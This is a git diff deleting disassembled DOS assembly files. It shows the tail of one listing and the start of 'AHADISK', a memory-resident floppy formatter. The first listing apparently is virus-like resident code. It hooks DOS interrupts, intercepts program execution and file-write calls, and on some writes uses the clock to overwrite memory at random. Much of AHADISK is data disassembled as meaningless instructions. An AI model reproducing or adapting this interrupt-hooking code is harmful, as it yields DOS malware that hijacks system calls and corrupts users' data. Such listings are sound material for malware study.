0 -data_25 dw 7BCh ; Data table (indexed access) -data_26 dw 701h ; Data table (indexed access) -data_27 dw 7BCh -data_28 dw 501h -data_29 db 0 -data_30 db 0FFh -data_31 dw 0A10h -data_32 dw 743h -data_33 dw 3D7Bh -data_34 dw 7B6Eh - db 90h -data_35 dd 28C138Dh -data_37 dd 0A1004EBh -data_39 dw 20h - db 90h, 90h, 4Dh, 10h, 0Ah,0FFh - db 0Fh - db 11 dup (90h) - db 0E9h,0CCh, 03h, 90h, 90h, 90h - db 90h, 90h, 9Ch, 50h, 31h,0C0h - db 2Eh, 38h, 26h,0DAh, 05h, 75h - db 07h -loc_49: - pop ax - popf ; Pop flags - jmp cs:data_37 ; (936E:05E8=4EBh) - cmp di,0 - jne loc_49 ; Jump if not equal - pop ax - popf ; Pop flags - mov ax,3 - iret ; Interrupt return - db 90h, 90h, 90h, 00h, 90h, 00h - db 0FFh,0FFh,0FFh,0FFh,0FFh, 9Ch - db 80h,0FCh, 4Eh, 75h, 02h,0EBh - db 1Ch, 80h,0FCh, 4Bh, 75h, 02h - db 0EBh, 15h -loc_50: - cmp ah,0Eh - jne loc_51 ; Jump if not equal - jmp short loc_53 ; (0654) -loc_51: - cmp ah,40h ; '@' - jne loc_52 ; Jump if not equal - jmp short loc_53 ; (0654) -loc_52: - popf ; Pop flags - jmp cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_53: - cli ; Disable interrupts - push es - push ds - push di - push si - push bp - push dx - push cx - push bx - push ax - mov cs:data_31,ss ; (936E:05DB=0A10h) - mov cs:data_32,sp ; (936E:05DD=743h) - mov al,0FFh - mov cs:data_30,al ; (936E:05DA=0FFh) - mov ax,3524h - int 7Eh ; ??INT Non-standard interrupt. - cmp word ptr cs:data_37,bx ; (936E:05E8=4EBh) - jne loc_54 ; Jump if not equal - mov ax,2524h - mov dx,108h - push cs - pop ds - int 7Eh ; ??INT Non-standard interrupt. -loc_54: - sti ; Enable interrupts - jmp short loc_56 ; (06AA) -loc_55: - cli ; Disable interrupts - xor ax,ax ; Zero register - mov cs:data_30,ah ; (936E:05DA=0FFh) - mov ss,cs:data_31 ; (936E:05DB=0A10h) - mov sp,cs:data_32 ; (936E:05DD=743h) - pop ax - pop bx - pop cx - pop dx - pop bp - pop si - pop di - pop ds - pop es - popf ; Pop flags - sti ; Enable interrupts - jmp cs:data_35 ; (936E:05E4=138Dh) - db 90h -loc_56: - pop ax - pop bx - push bx - push ax - cmp ah,4Bh ; 'K' - je loc_61 ; Jump if equal - cmp ah,40h ; '@' - jne loc_57 ; Jump if not equal - jmp short loc_60 ; (06CC) -loc_57: - cmp ah,0Eh - jne loc_58 ; Jump if not equal - jmp short loc_55 ; (0687) -loc_58: - cmp ah,4Eh ; 'N' - jne loc_55 ; Jump if not equal - jmp short loc_55 ; (0687) - db 90h -loc_59: - jmp loc_62 ; (0783) -loc_60: - mov ax,0Fh - cmp cs:data_29,al ; (936E:05D9=0) - jb loc_55 ; Jump if below - ja loc_59 ; Jump if above - cmp bx,4 - jbe loc_55 ; Jump if below or = - mov bx,1 - push cs - pop ds - add ds:data_11e,bx ; (936E:00FA=0) - mov ah,2Ch ; ',' - int 7Eh ; ??INT Non-standard interrupt. - cmp dh,ds:data_11e ; (936E:00FA=0) - ja loc_55 ; Jump if above - mov bx,data_3e ; (0A10:000E=1) - add bx,data_32 ; (936E:05DD=743h) - mov ss:[bx],bx - jmp short loc_55 ; (0687) - db 01h, 90h, 90h, 90h -loc_61: - jmp loc_63 ; (1A7F) - db 'Hello - Copyright S & S Internat' - db 'ional, 1990', 0Ah, 0Dh, '$' - db 1Ah, 41h, 41h - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAA' -loc_62: - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' - db 'AAAAAAAAAAAAAAAA' -loc_63: - mov ah,9 - mov dx,offset data_14 ; (936E:0103=90h) - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - int 20h ; Program Terminate - -seg_a ends - - - - end start diff --git a/a/AHADISK (16).ASM b/a/AHADISK (16).ASM deleted file mode 100755 index 41a32c3..0000000 --- a/a/AHADISK (16).ASM +++ /dev/null @@ -1,4042 +0,0 @@ - -PAGE 59,132 - -; -; -; AHADISK -; -; Created: 29-Feb-92 -; Passes: 5 Analysis Options on: none -; -; - -data_1e equ 0 -data_2e equ 1 -data_3e equ 3 -data_4e equ 94h -keybd_flags_1_ equ 417h -dsk_recal_stat_ equ 43Eh -dsk_motor_stat_ equ 43Fh -dsk_motor_tmr_ equ 440h -video_mode_ equ 449h -video_port_ equ 463h -timer_low_ equ 46Ch -hdsk0_media_st_ equ 490h -data_16e equ 1000h ;* -data_17e equ 0 ;* -data_18e equ 3 ;* -data_234e equ 7C3Eh ;* - -;-------------------------------------------------------------- seg_a ---- - -seg_a segment byte public - assume cs:seg_a , ds:seg_a - - -; -; -; Program Entry Point -; -; - - -ahadisk proc far - -start: - jmp loc_262 -data_24 db 0, 0 -data_25 dw 0 -data_26 dw 0 -data_27 dw 0 -data_28 db 0 -data_29 db 0 -data_30 db 0 - db 0 -data_31 dw 1 -data_32 db 19h - db 0 -data_33 db ' ', 0 - db 27h, 0 - db '.', 0 - db ' 360 K', 0 - db ' 1.2 M', 0 - db ' 720 K', 0 - db '1.44 M', 0 -data_37 db 0FFh - db 11h,0FFh -data_38 db 1Dh - db 0FFh, 11h,0FFh, 23h -data_39 db 1 - db 0, 2, 0 -data_40 db 23h - db 00h, 3Bh, 00h, 23h, 00h, 47h - db 00h -data_41 db 2 - db 1, 2 -data_42 db 1 -data_43 db 0DFh - db 0DFh,0DFh,0AFh -data_44 db 9 - db 0Fh, 09h, 12h -data_45 db 2Ah - db 1Bh, 2Ah, 1Ah -data_46 db 50h - db 54h, 50h, 6Ch -data_47 db 0FDh - db 0F9h,0F9h,0F0h -data_48 db 70h - db 0 - db 0E0h, 00h - -locloop_2: - jo loc_3 ; Jump if overflow=1 -loc_3: - loopnz $+2 ; Loop if zf=0, cx>0 - - rol byte ptr [bp+si],1 ; Rotate - db 60h, 09h,0A0h, 05h, 40h, 0Bh -data_50 db 2 - db 0, 7, 0, 3, 0, 9 - db 0 -data_51 db 62h - db 01h, 43h, 09h,0C9h, 02h, 1Fh - db 0Bh -data_52 db 6 - db 1, 4, 3 -data_53 db 0 -data_54 dw 0 -data_55 db 0 -data_56 db 0 -data_57 db 2Ah -data_58 db 50h -data_59 db 0 -data_60 db 0, 0 -data_61 dw 0 -data_62 db 0 -data_63 db 0 -data_64 db 0 -data_65 db 0 -data_66 db 0 -data_67 dw 0 -data_68 dw 0 -data_69 db 0 -data_70 db 0 -data_71 db 0 -data_72 db 0 -data_73 db 0 -data_74 db 0 -data_75 db 0 -data_76 db 0 -data_77 db 0 -data_78 db 0 -data_79 db 0 -data_80 db 0 -data_81 dw 130Dh -data_82 dw 0 -data_84 dw 0 -data_85 dw 0 -data_86 dw 0 -data_87 dw 0 -data_88 dw 0 -data_89 dw 0 -data_90 dw 0 -data_91 dw 0 -data_92 dw 0 -data_93 dw 0 -data_94 db 0 -data_95 db 0 -data_96 db 0Bh -data_97 db 0 -data_98 db 0, 0 -data_99 db 0 -data_100 dw 0 -data_101 db 0 -data_102 db 0 -data_103 db 0 -data_104 db 0 -data_105 dw 0 -data_106 dw 0 -data_107 db 0 -data_108 db 0 -data_109 db 0 -data_110 db 6 -data_111 db 0A0h -data_112 db 0 -data_113 db 0 - db 11 dup (0) -data_115 db 0 - db 9 dup (0) - -ahadisk endp - -; -; SUBROUTINE -; - -sub_2 proc near - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+di],al - add [bx],cl - add [bx+di],al - add [bp+si],cl - add [si+0],ah -;* call sub_5 ;* - db 0E8h, 03h, 10h - daa ; Decimal adjust - mov al,byte ptr ds:[4086h] - inc dx - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - ja $+7 ; Jump if above - add [bx+si],al - add [bx+si],al - pop dx - xor ax,355Ah - pop dx - xor ax,577h - add [bx+si],al - -; External Entry into Subroutine - -sub_3: - add [bx+si],al - add [bx+si],al - add [bx+si],al - pop dx - xor ax,0 - add [bx+si],al - add [bx+si],al - pop dx - xor ax,0 - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - pop dx - xor ax,577h - pop dx - xor ax,0 - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add bh,dh -;* pop cs ; Dangerous 8088 only - db 0Fh -;* jo loc_4 ;*Jump if overflow=1 - db 70h,0FFh - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [bx+si],al - add [di+6Eh],al - jz loc_5 ; Jump if zero - jc $+22h ; Jump if carry Set - inc sp - jc $+6Bh ; Jump if carry Set - jbe loc_6 ; Jump if below or = - and [si+6Fh],dl - and [bp+si+65h],al - and [bp+6Fh],al - jc $+6Fh ; Jump if carry Set - db 61h, 74h, 20h, 3Fh, 20h, 5Bh - db 'A' - db 5Dh, 00h - db 'Enter Drive Type ? (0 - 360K, 1 ' - db '- 1.2M) [0]' - db 0 - db 'Enter Drive Type ? (0 - 720K,' -loc_5: - and [bx+di],dh - and [di],ch - and [bx+di],dh -loc_6: - db '.44M) [0]' - db 0 - db 'Number Of Diskette To Be Format ' - db '(1-11) [' -data_182 dw 3131h - db 5Dh, 20h, 3Fh, 20h, 00h - db 'Insert New Diskette Into Drive ' -data_183 db 41h - db 0 - db 'Press ENTER To Start Format Or E' - db 'SC To Abort' - db 0 - db 'Can', 27h, 't Release From Memor' - db 'y, Interrupt Vector Address Been' - db ' Changed' - db 0 - db 'Press Any Key To Return To Main ' - db 'Menu' - db 0 - db 'No Format Report !' - db 00h, 00h, 00h, 00h, 00h, 2Dh - db 00h, 00h, 00h, 00h, 00h - db 43h, 70h -data_184 db 'HpApNpGpEpEpRpRpOpRp!pFpIpNpIpSp' - db 'Hp p p', 0 - db 'p', 0 - db 'p p pDisk Not Ready !', 0 - db 'Disk Write Protected !', 0 - db 'Seek Error !', 0 - db 'Abort or Retry ?', 0 - db 'Track 0 Bad, Diskette Unusable !' - db 0 - db 'Program Interrupted !', 0 - db 'Ready Printer, Press ENTER When ' - db 'Ready !', 0 - db 'Printing ....', 0 - db 'I/O Error !', 0 - db 'Printer Not Ready !', 0 - db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 13h, 20h,0ADh - db 'aHa/nBa!Mem Resident Format ' - db 1, 3 - db ' Version 6.9' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0CCh, 01h - db 4Eh,0CDh,0B9h,0BAh, 01h, 4Eh - db 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h - db 4Eh, 20h - db 0BAh,0C8h, 01h, 4Eh,0CDh,0BCh - db 01h, 87h,0D0h, 1Fh,0C9h, 01h - db 4Eh,0CDh,0BBh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 13h, 20h - db 0ADh - db 'aHa/nBa!Mem Resident Format ' - db 1, 3 - db ' Version 6.9' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0CCh, 01h - db 4Eh,0CDh,0B9h,0BAh, 01h, 1Ch - db 20h - db 0DAh, 01h, 15h,0C4h,0BFh, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0B3h - db ' Print Out ' - db 0ADh - db 'aHa/nBa! ' - db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh - db 01h, 1Ch, 20h,0C0h, 01h, 15h - db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh - db 0BAh, 01h, 1Ch, 20h,0DAh, 01h - db 15h,0C4h - db 0BFh, 01h, 1Bh, 20h,0BAh,0BAh - db 01h, 1Ch, 20h,0B3h, 01h, 04h - db ' Start format' - db 01h, 05h, 20h,0B3h, 01h, 1Bh - db 20h,0BAh,0BAh, 01h, 1Ch, 20h - db 0C0h, 01h, 15h,0C4h,0D9h, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0DAh, 01h, 15h,0C4h,0BFh - db 01h, 1Bh, 20h,0BAh,0BAh, 01h - db 1Ch, 20h,0B3h, 01h, 04h - db ' Format report' - db 01h, 04h, 20h,0B3h, 01h, 1Bh - db 20h,0BAh,0BAh, 01h, 1Ch, 20h - db 0C0h, 01h, 15h,0C4h,0D9h, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0DAh, 01h, 15h,0C4h,0BFh - db 01h, 1Bh, 20h,0BAh,0BAh, 01h - db 1Ch, 20h,0B3h - db ' Track display o' -data_187 dw 206Eh - db 20h, 20h,0B3h, 01h, 1Bh, 20h - db 0BAh,0BAh, 01h, 1Ch, 20h,0C0h - db 01h, 15h,0C4h,0D9h, 01h, 1Bh - db 20h,0BAh,0BAh, 01h, 1Ch, 20h - db 0DAh, 01h, 15h,0C4h,0BFh, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0B3h - db ' Release from memory ' - db 0B3h, 01h, 1Bh, 20h,0BAh,0BAh - db 01h, 1Ch, 20h,0C0h, 01h, 15h - db 0C4h,0D9h, 01h, 1Bh, 20h,0BAh - db 0BAh, 01h, 1Ch, 20h,0DAh, 01h - db 15h,0C4h,0BFh, 01h, 1Bh, 20h - db 0BAh,0BAh, 01h, 1Ch, 20h,0B3h - db 01h, 09h, 20h, 45h, 78h, 69h - db 74h, 01h, 08h, 20h,0B3h, 01h - db 1Bh, 20h,0BAh,0BAh, 01h, 1Ch - db 20h,0C0h, 01h, 15h,0C4h,0D9h - db 01h, 1Bh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0C8h, 01h, 4Eh - db 0CDh,0BCh, 01h, 87h,0D0h, 1Fh - db 0C9h, 01h, 4Eh,0CDh,0BBh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 13h, 20h,0ADh - db 'aHa/nBa!Mem Resident Format ' - db 1, 3 - db ' Version 6.9' - db 01h, 10h, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0CCh, 01h - db 4Eh - db 0CDh,0B9h,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh,0BAh, 01h, 4Eh, 20h,0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0BAh, 01h - db 4Eh, 20h,0BAh,0BAh, 01h, 4Eh - db 20h,0BAh,0BAh, 01h, 4Eh, 20h - db 0BAh - db 0BAh, 01h, 4Eh, 20h,0BAh,0BAh - db 01h, 4Eh, 20h,0BAh,0CCh, 01h - db 17h - db 0CDh,0D1h, 01h, 0Fh,0CDh,0D1h - db 01h, 10h,0CDh,0D1h, 01h, 15h - db 0CDh,0B9h,0BAh, 01h - db 3 - db ' Drive To Be Format ' - db 0B3h, 01h, 03h - db ' Drive Type ' - db 0B3h - db ' Diskette No. ' - db 0B3h - db ' Total Diskette(s) ' - db 0BAh,0C7h, 01h, 17h,0C4h,0C5h - db 01h, 0Fh,0C4h,0C5h, 01h, 10h - db 0C4h,0C5h, 01h, 15h,0C4h,0B6h - db 0BAh, 01h, 0Bh - db 20h -data_188 db 41h - db 01h, 0Bh, 20h,0B3h, 01h, 05h - db 20h -data_189 db 31h - db 2Eh, 34h, 34h, 20h, 4Dh, 01h - db 04h, 20h,0B3h, 